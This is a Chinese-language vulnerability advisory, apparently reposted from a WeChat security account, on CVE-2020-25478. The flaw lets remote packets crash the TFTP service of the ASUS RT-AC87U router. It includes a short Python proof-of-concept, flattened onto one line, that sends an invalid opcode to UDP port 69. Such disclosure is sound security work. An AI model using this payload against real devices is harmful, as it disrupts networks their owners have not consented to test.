华硕 RT-AC87U TFTP 易受拒绝服务 (DoS) 攻击

华硕 RT-AC87U TFTP 易受拒绝服务 (DoS) 攻击
2022-9-14 18:53:12 Author: Ots安全(查看原文) 阅读量:15 收藏

ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

CVE-2020-25478 - ASUS RT-AC87U TFTP 易受拒绝服务 (DoS) 攻击

受影响产品的名称和版本

华硕 RT-AC87U 3.0.0.4.382_51640

问题类型

它主要与 CWE-20 相关，在华硕 RT-AC87U 中运行的 TFTP 服务在向服务发送无效操作码时容易受到拒绝服务 (DoS) 攻击。以下python代码段用于测试漏洞：

import socketimport sys  tftpd = ('192.168.1.1', 69)#Try and open an UDP SOCKETtry:  tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)except:  print("Failed on socket creation, so exiting")  sys.exit(1)#create a invalid opcode exeeding the 2 byte length# opcode operation# 1 Read request (RRQ)# 2 Write request (WRQ)# 3 Data (DATA)# 4 Acknowledgment (ACK)# 5 Error (ERROR)  invalidOpcode = "0000"  tftp.sendto(invalidOpcode,tftpd)

描述

Asus RT-AC87U 版本 3.0.0.4.382_51640 容易受到对 TFTP 服务的拒绝服务攻击导致 TFTP 服务崩溃。TFTP 服务很容易通过发送无效的操作码远程崩溃。

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjYyMzkwOA==&mid=2247495532&idx=1&sn=81e19f12ffd7e45e6d7c4d640ca13deb&chksm=9bada627acda2f31a93ccbb91c36920ad77f69732ce7b76643e35e75c8e6c63bd4b21abae79c#rd
如有侵权请联系:admin#unsafe.sh